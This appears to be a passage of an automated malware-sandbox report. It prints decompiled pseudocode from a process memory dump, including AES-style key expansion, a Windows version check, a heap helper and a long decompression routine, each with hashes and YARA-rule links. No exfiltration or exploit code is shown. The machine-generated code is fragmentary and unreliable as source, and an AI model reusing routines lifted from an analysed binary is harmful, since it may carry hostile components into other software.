					 *((intOrPtr*)(_t437 + 0x10)) = _t240;
				} while (_t240 <= 0x90);
				 *(_t437 + 0x84) = _t379;
				_t399 =  *((intOrPtr*)(_t437 + 0xd0));
				 *(_t437 + 0x88) = _t427;
				_t434 =  *((intOrPtr*)(_t437 + 0x48));
				 *(_t437 + 0x7c) = _t418;
				 *(_t437 + 0x80) = _t407;
				do {
					_t376 =  *((intOrPtr*)(_t399 + 0xf4));
					_t333 =  *(_t437 + _t434 + 0x6c) ^  *(_t376 + _t434) ^  *(_t437 + _t434 + 0x4c);
					 *(_t376 + _t434) = _t333;
					_t434 = _t434 + 4;
				} while (_t434 < 0x20);
				return _t333;
			}

0x00263eb3
0x00263ecd
0x00263ed5
0x00263edd
0x00263edd
0x00263ee9
0x00263eec
0x00263eec
0x00263ef8
0x00263efe
0x00263f04
0x00263f0a
0x00263f0e
0x00263f17
0x00263f20
0x00263f26
0x00263f2f
0x00263f39
0x00263f41
0x00263f49
0x00263f51
0x00263f59
0x00263f61
0x00263f65
0x00263f69
0x00263f6d
0x00263f71
0x00263f75
0x00263f7d
0x00263f81
0x00263f85
0x00263f85
0x00263f99
0x00263f9f
0x00263fa3
0x00263fa9
0x00263fac
0x00263fae
0x00263fb0
0x00263fb4
0x00263fb8
0x00263fbb
0x00263fbf
0x00263fd3
0x00263fd9
0x00263fdd
0x00263fe3
0x00263fe6
0x00263fea
0x00263fee
0x00263ff1
0x00263ffd
0x0026400f
0x00264015
0x00264019
0x0026401f
0x00264022
0x00264024
0x00264026
0x0026402a
0x0026402e
0x00264031
0x00264035
0x00264049
0x0026404f
0x00264053
0x00264059
0x0026405c
0x00264060
0x00264064
0x00264067
0x0026406f
0x00264083
0x0026408b
0x00264091
0x00264094
0x00264096
0x00264098
0x0026409c
0x002640a0
0x002640a3
0x002640b3
0x002640b9
0x002640bd
0x002640c3
0x002640c6
0x002640ca
0x002640ce
0x002640d1
0x002640d5
0x002640d9
0x002640eb
0x002640f1
0x002640f5
0x002640fb
0x002640fe
0x00264100
0x00264102
0x00264106
0x00264111
0x0026411d
0x00264123
0x00264127
0x0026412d
0x00264130
0x00264134
0x00264138
0x0026413b
0x0026413f
0x00264143
0x00264155
0x0026415b
0x0026415f
0x00264165
0x00264168
0x0026416a
0x0026416c
0x00264170
0x0026417b
0x00264187
0x0026418d
0x00264191
0x00264195
0x0026419b
0x0026419e
0x002641a0
0x002641a2
0x002641a6
0x002641aa
0x002641ae
0x002641b1
0x002641b5
0x002641b9
0x002641c0
0x002641cd
0x002641cf
0x002641d3
0x002641dd
0x002641e0
0x002641e2
0x002641e4
0x002641e8
0x002641ec
0x002641ef
0x002641ff
0x00264205
0x00264209
0x0026420d
0x00264213
0x00264216
0x00264218
0x0026421a
0x0026421e
0x00264222
0x00264226
0x00264229
0x0026422d
0x00264231
0x00264238
0x00264245
0x0026424b
0x0026424f
0x00264255
0x00264258
0x0026425a
0x0026425c
0x00264260
0x00264264
0x00264267
0x00264277
0x0026427d
0x00264281
0x00264285
0x0026428b
0x0026428e
0x00264290
0x00264292
0x00264296
0x00264299
0x0026429d
0x002642a1
0x002642a5
0x002642a9
0x002642bb
0x002642c1
0x002642c5
0x002642cb
0x002642ce
0x002642d0
0x002642d2
0x002642d6
0x002642e1
0x002642ed
0x002642ef
0x002642f3
0x002642f7
0x002642f9
0x00264300
0x00264302
0x00264304
0x00264308
0x00264310
0x00264313
0x00264316
0x0026431a
0x0026431e
0x00264322
0x00264326
0x0026432a
0x00264335
0x0026433c
0x00264343
0x0026434a
0x0026434e
0x00264352
0x00264359
0x00264359
0x00264366
0x0026436a
0x0026436d
0x00264370
0x0026437f

Strings

gj, xrefs: 00263EF0

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 0be6bb3990460c01f1a3f8236198a3d8a55dfde4dac50182a2d80752478700cf
Instruction ID: 5274def13d205afb7f5d9561c64b35eaa07770eb0feeba974b484ff596ce8fac
Opcode Fuzzy Hash: 0be6bb3990460c01f1a3f8236198a3d8a55dfde4dac50182a2d80752478700cf
Instruction Fuzzy Hash: 94F1E5B1A083418FD748CF29D880A2AFBE1BFC8208F15896EF498D7711D734E9598F56

Uniqueness

Uniqueness Score: -1.00%

Function 0026A995, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0026A995() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0x29d020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0x2a00f0; // 0x6
					_t13 =  *0x2a00f4; // 0x1
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0x29d020 = _t12;
					 *0x2a00f0 = _t6;
					 *0x2a00f4 = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}

0x0026a998
0x0026a9a7
0x0026a9e5
0x0026a9ea
0x0026a9a9
0x0026a9af
0x0026a9ba
0x0026a9c0
0x0026a9c6
0x0026a9cc
0x0026a9d2
0x0026a9d8
0x0026a9dd
0x0026a9dd
0x0026a9f3
0x00000000
0x0026a9f5
0x00000000
0x0026a9f8

APIs

GetVersionExW.KERNEL32(?), ref: 0026A9BA

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 79b4aea16ed3e9bead3595e5f8bb54bd8c7656856255ed4a9261ca39718706fb
Instruction ID: 18ddf1d026b494a1584f5b4b33fb72d995d33145f197fc641c85175f67764bba
Opcode Fuzzy Hash: 79b4aea16ed3e9bead3595e5f8bb54bd8c7656856255ed4a9261ca39718706fb
Instruction Fuzzy Hash: 10F03AB09112198BCB28CF18FE8ABE573B5F759314F20429ADE1593350E770AD90DEA2

Uniqueness

Uniqueness Score: -1.00%

Function 0026E510, Relevance: 1.4, Strings: 1, Instructions: 154
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0026E510(intOrPtr __ecx, signed char _a4) {
				char _v12;
				signed int _v13;
				signed int _v14;
				signed int _v15;
				signed int _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				char _v28;
				signed int _v29;
				signed int _v30;
				signed int _v31;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed char _t96;
				signed int _t117;
				signed int* _t121;
				signed int* _t122;
				void* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				void* _t129;
				void* _t130;
				signed int _t131;
				char* _t132;
				void* _t133;
				signed int _t135;
				intOrPtr _t137;
				signed char* _t139;
				void* _t141;
				void* _t161;
				void* _t164;

				_t137 = __ecx;
				_t135 = _a4 - 6;
				_v40 = __ecx;
				_v36 = _t135;
				_t96 = E0027EA80( &_v32, _a4, 0x20);
				_t141 =  &_v40 + 0xc;
				_t117 = 0;
				_t133 = 0;
				_t126 = 0;
				if(_t135 <= 0) {
					L10:
					if(_t117 <= _a4) {
						_t127 = 0x2a4330;
						do {
							_v32 = _v32 ^  *(( *(_t141 + 0x15 + _t135 * 4) & 0x000000ff) + 0x2a4130);
							_v31 = _v31 ^  *(( *(_t141 + 0x16 + _t135 * 4) & 0x000000ff) + 0x2a4130);
							_v30 = _v30 ^  *(( *(_t141 + 0x17 + _t135 * 4) & 0x000000ff) + 0x2a4130);
							_v29 = _v29 ^  *(( *(_t141 + 0x14 + _t135 * 4) & 0x000000ff) + 0x2a4130);
							_t96 =  *_t127;
							_v32 = _v32 ^ _t96;
							_v36 = _t127 + 1;
							if(_t135 == 8) {
								_t121 =  &_v28;
								_a4 = 3;
								do {
									_t129 = 4;
									do {
										 *_t121 =  *_t121 ^  *(_t121 - 4);
										_t121 =  &(_t121[0]);
										_t129 = _t129 - 1;
									} while (_t129 != 0);
									_t58 =  &_a4;
									 *_t58 = _a4 - 1;
								} while ( *_t58 != 0);
								_t122 =  &_v12;
								_a4 = 3;
								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0x2a4130);
								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0x2a4130);
								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0x2a4130);
								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0x2a4130);
								do {
									_t130 = 4;
									do {
										_t96 =  *((intOrPtr*)(_t122 - 4));
										 *_t122 =  *_t122 ^ _t96;
										_t122 =  &(_t122[0]);
										_t130 = _t130 - 1;
									} while (_t130 != 0);
									_t79 =  &_a4;
									 *_t79 = _a4 - 1;
								} while ( *_t79 != 0);
							} else {
								if(_t135 > 1) {
									_t132 =  &_v28;
									_a4 = _t135 - 1;
									do {
										_t124 = 0;
										do {
											_t96 =  *((intOrPtr*)(_t132 + _t124 - 4));
											 *(_t132 + _t124) =  *(_t132 + _t124) ^ _t96;
											_t124 = _t124 + 1;
										} while (_t124 < 4);
										_t132 = _t132 + 4;
										_t53 =  &_a4;
										 *_t53 = _a4 - 1;
									} while ( *_t53 != 0);
								}
							}
							_t131 = 0;
							if(_t135 <= 0) {
								L37:
								_t164 = _t117 - _a4;
							} else {
								while(_t117 <= _a4) {
									if(_t131 >= _t135) {
										L33:
										_t161 = _t133 - 4;
									} else {
										_t96 =  &(( &_v32)[_t131]);
										_a4 = _t96;
										while(_t133 < 4) {
											 *((intOrPtr*)(_t137 + 0x18 + (_t133 + _t117 * 4) * 4)) =  *_t96;
											_t131 = _t131 + 1;
											_t96 = _a4 + 4;
											_t133 = _t133 + 1;
											_a4 = _t96;
											if(_t131 < _t135) {
												continue;
											} else {
												goto L33;
											}
											goto L34;
										}
									}
									L34:
									if(_t161 == 0) {
										_t117 = _t117 + 1;
										_t133 = 0;
									}
									if(_t131 < _t135) {
										continue;
									} else {
										goto L37;
									}
									goto L38;
								}
							}
							L38:
							_t127 = _v36;
						} while (_t164 <= 0);
					}
				} else {
					while(_t117 <= _a4) {
						if(_t126 < _t135) {
							_t139 =  &(( &_v32)[_t126]);
							while(_t133 < 4) {
								_t125 = _t133 + _t117 * 4;
								_t96 =  *_t139;
								_t126 = _t126 + 1;
								_t139 =  &_a4;
								_t133 = _t133 + 1;
								 *(_v40 + 0x18 + _t125 * 4) = _t96;
								_t135 = _v36;
								if(_t126 < _t135) {
									continue;
								}
								break;
							}
							_t137 = _v40;
						}
						if(_t133 == 4) {
							_t117 = _t117 + 1;
							_t133 = 0;
						}
						if(_t126 < _t135) {
							continue;
						} else {
							goto L10;
						}
						goto L39;
					}
				}
				L39:
				return _t96;
			}

0x0026e516
0x0026e526
0x0026e529
0x0026e52e
0x0026e532
0x0026e537
0x0026e53a
0x0026e53c
0x0026e53e
0x0026e542
0x0026e589
0x0026e58c
0x0026e592
0x0026e597
0x0026e5a6
0x0026e5b5
0x0026e5c4
0x0026e5d3
0x0026e5d7
0x0026e5d9
0x0026e5de
0x0026e5e5
0x0026e616
0x0026e61a
0x0026e622
0x0026e624
0x0026e625
0x0026e628
0x0026e62a
0x0026e62b
0x0026e62b
0x0026e630
0x0026e630
0x0026e630
0x0026e63c
0x0026e640
0x0026e64e
0x0026e65d
0x0026e66c
0x0026e67b
0x0026e67f
0x0026e681
0x0026e682
0x0026e682
0x0026e685
0x0026e687
0x0026e688
0x0026e688
0x0026e68d
0x0026e68d
0x0026e68d
0x0026e5e7
0x0026e5ea
0x0026e5f3
0x0026e5f7
0x0026e5fb
0x0026e5fb
0x0026e5fd
0x0026e5fd
0x0026e601
0x0026e604
0x0026e605
0x0026e60a
0x0026e60d
0x0026e60d
0x0026e60d
0x0026e614
0x0026e5ea
0x0026e694
0x0026e698
0x0026e6d9
0x0026e6d9
0x00000000
0x0026e69a
0x0026e6a1
0x0026e6cd
0x0026e6cd
0x0026e6a3
0x0026e6a7
0x0026e6aa
0x0026e6ae
0x0026e6b8
0x0026e6bc
0x0026e6c1
0x0026e6c4
0x0026e6c5
0x0026e6cb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0026e6cb
0x0026e6ae
0x0026e6d0
0x0026e6d0
0x0026e6d2
0x0026e6d3
0x0026e6d3
0x0026e6d7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0026e6d7
0x0026e69a
0x0026e6dc
0x0026e6dc
0x0026e6dc
0x0026e597
0x00000000
0x0026e544
0x0026e54f
0x0026e555
0x0026e559
0x0026e562
0x0026e565
0x0026e568
0x0026e569
0x0026e56c
0x0026e56d
0x0026e571
0x0026e577
0x00000000
0x00000000
0x00000000
0x0026e577
0x0026e579
0x0026e579
0x0026e580
0x0026e582
0x0026e583
0x0026e583
0x0026e587
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0026e587
0x0026e544
0x0026e6ed
0x0026e6ed

Strings

0C*, xrefs: 0026E592

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0C*
API String ID: 0-3687180690
Opcode ID: 0ca343b4fbe01ba798607fee5ac2fae74230b8f55228486d592dfd98218d7047
Instruction ID: f75eded2ddf6deb3e8001ab746bd160d8360537d679dd3d4d2b545c4fed1878a
Opcode Fuzzy Hash: 0ca343b4fbe01ba798607fee5ac2fae74230b8f55228486d592dfd98218d7047
Instruction Fuzzy Hash: CB51C23491C3914FCB12DF25D18046EBFE5AEEA318F4A489EE4E54B212D230E699CF53

Uniqueness

Uniqueness Score: -1.00%

Function 0028ACA1, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0028ACA1() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x2c0874 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x0028aca1
0x0028aca9
0x0028acb1

APIs

GetProcessHeap.KERNEL32 ref: 0028ACA1

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: a477b0251ead29bd2d8aefb6da2308c19bedd3ea86b16dbcdac29871cc38f16b
Instruction ID: b0b90b908c02d4fc536f946ffaeefb660ede3a28b0446e422b8cd0522a068f17
Opcode Fuzzy Hash: a477b0251ead29bd2d8aefb6da2308c19bedd3ea86b16dbcdac29871cc38f16b
Instruction Fuzzy Hash: 30A02230203200CF83008F38FF0C30C3AE8BA00AC0308C22AB20CC2030EB30C0308B00

Uniqueness

Uniqueness Score: -1.00%

Function 0027589E, Relevance: .8, Instructions: 800
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0027589E(intOrPtr __esi) {
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				void* _t328;
				intOrPtr _t333;
				signed int _t347;
				char _t356;
				unsigned int _t359;
				void* _t366;
				intOrPtr _t371;
				signed int _t381;
				char _t390;
				unsigned int _t391;
				void* _t399;
				intOrPtr _t400;
				signed int _t403;
				char _t412;
				signed int _t414;
				intOrPtr _t415;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed short _t424;
				signed int _t425;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t434;
				signed short _t435;
				unsigned int _t439;
				unsigned int _t444;
				signed int _t458;
				signed int _t460;
				signed int _t461;
				signed int _t464;
				signed int _t466;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				intOrPtr* _t474;
				signed int _t478;
				signed int _t479;
				intOrPtr _t483;
				unsigned int _t486;
				void* _t488;
				signed int _t491;
				signed int* _t493;
				unsigned int _t496;
				void* _t498;
				signed int _t501;
				signed int _t503;
				signed int _t511;
				void* _t514;
				signed int _t517;
				signed int _t519;
				signed int _t522;
				void* _t525;
				signed int _t528;
				signed int _t529;
				intOrPtr* _t531;
				void* _t532;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				unsigned int _t546;
				void* _t548;
				signed int _t551;
				unsigned int _t555;
				void* _t557;
				signed int _t560;
				intOrPtr* _t562;
				void* _t563;
				signed int _t566;
				void* _t569;
				signed int _t572;
				intOrPtr* _t575;
				void* _t576;
				signed int _t579;
				void* _t582;
				signed int _t585;
				signed int _t586;
				intOrPtr* _t591;
				void* _t592;
				signed int _t595;
				signed int* _t598;
				unsigned int _t600;
				signed int _t603;
				unsigned int _t605;
				signed int _t608;
				void* _t611;
				signed int _t613;
				signed int _t614;
				void* _t615;
				unsigned int _t617;
				unsigned int _t621;
				signed int _t624;
				signed int _t625;
				signed int _t626;
				signed int _t627;
				signed int _t628;
				signed int _t629;
				unsigned int _t632;
				signed int _t634;
				intOrPtr* _t637;
				intOrPtr _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				char* _t646;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				char* _t652;
				intOrPtr* _t656;
				signed int _t657;
				void* _t658;
				void* _t661;

				L0:
				while(1) {
					L0:
					_t638 = __esi;
					_t598 = __esi + 0x7c;
					while(1) {
						L1:
						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
							goto L12;
						} else {
							_t637 = _t638 + 0x8c;
						}
						while(1) {
							L3:
							_t661 =  *_t643 -  *((intOrPtr*)(_t638 + 0x94)) - 1 +  *_t637;
							if(_t661 <= 0 && (_t661 != 0 ||  *(_t638 + 8) <  *((intOrPtr*)(_t638 + 0x90)))) {
								break;
							}
							L6:
							if( *((char*)(_t638 + 0x9c)) != 0) {
								L99:
								_t415 = E002747DA(_t638);
								L100:
								return _t415;
							}
							L7:
							_push(_t637);
							_push(_t643);
							_t415 = E002733D3(_t638);
							if(_t415 == 0) {
								goto L100;
							}
							L8:
							_push(_t638 + 0xa0);
							_push(_t637);
							_push(_t643);
							_t415 = E0027397F(_t638);
							if(_t415 != 0) {
								continue;
							} else {
								goto L100;
							}
						}
						L10:
						_t458 = E00274422(_t638);
						__eflags = _t458;
						if(_t458 == 0) {
							goto L99;
						} else {
							_t598 = _t638 + 0x7c;
						}
						L12:
						_t483 =  *((intOrPtr*)(_t638 + 0x4b3c));
						__eflags = (_t483 -  *_t598 &  *(_t638 + 0xe6dc)) - 0x1004;
						if((_t483 -  *_t598 &  *(_t638 + 0xe6dc)) >= 0x1004) {
							L18:
							_t314 = E0026A4ED(_t643);
							_t315 =  *(_t638 + 0x124);
							_t600 = _t314 & 0x0000fffe;
							__eflags = _t600 -  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4));
							if(_t600 >=  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4))) {
								L20:
								_t627 = 0xf;
								_t316 = _t315 + 1;
								__eflags = _t316 - _t627;
								if(_t316 >= _t627) {
									L26:
									_t486 =  *(_t643 + 4) + _t627;
									 *(_t643 + 4) = _t486 & 0x00000007;
									_t318 = _t486 >> 3;
									 *_t643 =  *_t643 + _t318;
									_t488 = 0x10;
									_t491 =  *((intOrPtr*)(_t638 + 0xe4 + _t627 * 4)) + (_t600 -  *((intOrPtr*)(_t638 + 0xa0 + _t627 * 4)) >> _t488 - _t627);
									__eflags = _t491 -  *((intOrPtr*)(_t638 + 0xa0));
									asm("sbb eax, eax");
									_t319 = _t318 & _t491;
									__eflags = _t319;
									_t460 =  *(_t638 + 0xd28 + _t319 * 2) & 0x0000ffff;
									goto L27;
								} else {
									_t591 = _t638 + (_t316 + 0x29) * 4;
									while(1) {
										L22:
										__eflags = _t600 -  *_t591;
										if(_t600 <  *_t591) {
											_t627 = _t316;
											goto L26;
										}
										L23:
										_t316 = _t316 + 1;
										_t591 = _t591 + 4;
										__eflags = _t316 - 0xf;
										if(_t316 < 0xf) {
											continue;
										} else {
											goto L26;
										}
									}
									goto L26;
								}
							} else {
								_t592 = 0x10;
								_t626 = _t600 >> _t592 - _t315;
								_t595 = ( *(_t626 + _t638 + 0x128) & 0x000000ff) +  *(_t643 + 4);
								 *_t643 =  *_t643 + (_t595 >> 3);
								 *(_t643 + 4) = _t595 & 0x00000007;
								_t460 =  *(_t638 + 0x528 + _t626 * 2) & 0x0000ffff;
								L27:
								__eflags = _t460 - 0x100;
								if(_t460 >= 0x100) {
									L31:
									__eflags = _t460 - 0x106;
									if(_t460 < 0x106) {
										L96:
										__eflags = _t460 - 0x100;
										if(_t460 != 0x100) {
											L102:
											__eflags = _t460 - 0x101;
											if(_t460 != 0x101) {
												L129:
												_t461 = _t460 + 0xfffffefe;
												__eflags = _t461;
												_t493 = _t638 + (_t461 + 0x18) * 4;
												_t603 =  *_t493;
												 *(_t658 + 0x30) = _t603;
												if(_t461 == 0) {
													L131:
													 *(_t638 + 0x60) = _t603;
													_t320 = E0026A4ED(_t643);
													_t321 =  *(_t638 + 0x2de8);
													_t605 = _t320 & 0x0000fffe;
													__eflags = _t605 -  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4));
													if(_t605 >=  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4))) {
														L133:
														_t628 = 0xf;
														_t322 = _t321 + 1;
														__eflags = _t322 - _t628;
														if(_t322 >= _t628) {
															L139:
															_t496 =  *(_t643 + 4) + _t628;
															 *(_t643 + 4) = _t496 & 0x00000007;
															_t324 = _t496 >> 3;
															 *_t643 =  *_t643 + _t324;
															_t498 = 0x10;
															_t501 =  *((intOrPtr*)(_t638 + 0x2da8 + _t628 * 4)) + (_t605 -  *((intOrPtr*)(_t638 + 0x2d64 + _t628 * 4)) >> _t498 - _t628);
															__eflags = _t501 -  *((intOrPtr*)(_t638 + 0x2d64));
															asm("sbb eax, eax");
															_t325 = _t324 & _t501;
															__eflags = _t325;
															_t326 =  *(_t638 + 0x39ec + _t325 * 2) & 0x0000ffff;
															L140:
															_t629 = _t326 & 0x0000ffff;
															__eflags = _t629 - 8;
															if(_t629 >= 8) {
																_t464 = (_t629 >> 2) - 1;
																_t629 = (_t629 & 0x00000003 | 0x00000004) << _t464;
																__eflags = _t629;
															} else {
																_t464 = 0;
															}
															_t632 = _t629 + 2;
															__eflags = _t464;
															if(_t464 != 0) {
																_t391 = E0026A4ED(_t643);
																_t525 = 0x10;
																_t632 = _t632 + (_t391 >> _t525 - _t464);
																_t528 =  *(_t643 + 4) + _t464;
																 *_t643 =  *_t643 + (_t528 >> 3);
																_t529 = _t528 & 0x00000007;
																__eflags = _t529;
																 *(_t643 + 4) = _t529;
															}
															__eflags =  *((char*)(_t638 + 0x4c44));
															_t608 =  *(_t658 + 0x30);
															 *(_t638 + 0x74) = _t632;
															if( *((char*)(_t638 + 0x4c44)) == 0) {
																L147:
																_t503 =  *(_t638 + 0x7c);
																_t466 = _t503 - _t608;
																_t328 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																__eflags = _t466 - _t328;
																if(_t466 >= _t328) {
																	L158:
																	__eflags = _t632;
																	if(_t632 == 0) {
																		while(1) {
																			L0:
																			_t638 = __esi;
																			_t598 = __esi + 0x7c;
																			goto L1;
																		}
																	}
																	L159:
																	_t644 =  *(_t638 + 0xe6dc);
																	do {
																		L160:
																		_t645 = _t644 & _t466;
																		_t466 = _t466 + 1;
																		 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t645));
																		_t598 = _t638 + 0x7c;
																		_t644 =  *(_t638 + 0xe6dc);
																		 *_t598 =  *_t598 + 0x00000001 & _t644;
																		_t632 = _t632 - 1;
																		__eflags = _t632;
																	} while (_t632 != 0);
																	goto L161;
																}
																L148:
																__eflags = _t503 - _t328;
																if(_t503 >= _t328) {
																	goto L158;
																}
																L149:
																_t333 =  *((intOrPtr*)(_t638 + 0x4b40));
																_t468 = _t466 + _t333;
																_t646 = _t333 + _t503;
																 *(_t638 + 0x7c) = _t503 + _t632;
																__eflags = _t608 - _t632;
																if(_t608 >= _t632) {
																	L154:
																	__eflags = _t632 - 8;
																	if(_t632 < 8) {
																		goto L117;
																	}
																	L155:
																	_t347 = _t632 >> 3;
																	__eflags = _t347;
																	 *(_t658 + 0x30) = _t347;
																	_t639 = _t347;
																	do {
																		L156:
																		E0027EA80(_t646, _t468, 8);
																		_t658 = _t658 + 0xc;
																		_t468 = _t468 + 8;
																		_t646 = _t646 + 8;
																		_t632 = _t632 - 8;
																		_t639 = _t639 - 1;
																		__eflags = _t639;
																	} while (_t639 != 0);
																	goto L116;
																}
																L150:
																_t611 = 8;
																__eflags = _t632 - _t611;
																if(_t632 < _t611) {
																	goto L117;
																}
																L151:
																_t511 = _t632 >> 3;
																__eflags = _t511;
																do {
																	L152:
																	_t632 = _t632 - _t611;
																	 *_t646 =  *_t468;
																	 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																	 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																	 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																	 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																	 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																	 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																	_t356 =  *((intOrPtr*)(_t468 + 7));
																	_t468 = _t468 + _t611;
																	 *((char*)(_t646 + 7)) = _t356;
																	_t646 = _t646 + _t611;
																	_t511 = _t511 - 1;
																	__eflags = _t511;
																} while (_t511 != 0);
																goto L117;
															} else {
																L146:
																_push( *(_t638 + 0xe6dc));
																_push(_t638 + 0x7c);
																_push(_t608);
																L71:
																_push(_t632);
																E002720EE();
																goto L0;
																do {
																	while(1) {
																		L0:
																		_t638 = __esi;
																		_t598 = __esi + 0x7c;
																		do {
																			while(1) {
																				L1:
																				 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																				if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																					goto L12;
																				} else {
																					_t637 = _t638 + 0x8c;
																				}
																				goto L3;
																			}
																			goto L103;
																		} while (_t632 == 0);
																		__eflags =  *((char*)(_t638 + 0x4c44));
																		if( *((char*)(_t638 + 0x4c44)) == 0) {
																			L106:
																			_t537 =  *(_t638 + 0x7c);
																			_t614 =  *(_t638 + 0x60);
																			_t399 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																			_t468 = _t537 - _t614;
																			__eflags = _t468 - _t399;
																			if(_t468 >= _t399) {
																				L125:
																				__eflags = _t632;
																				if(_t632 == 0) {
																					while(1) {
																						L0:
																						_t638 = __esi;
																						_t598 = __esi + 0x7c;
																						L1:
																						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																							goto L12;
																						} else {
																							_t637 = _t638 + 0x8c;
																						}
																					}
																				}
																				L126:
																				_t648 =  *(_t638 + 0xe6dc);
																				do {
																					L127:
																					_t649 = _t648 & _t468;
																					_t468 = _t468 + 1;
																					 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t649));
																					_t598 = _t638 + 0x7c;
																					_t648 =  *(_t638 + 0xe6dc);
																					 *_t598 =  *_t598 + 0x00000001 & _t648;
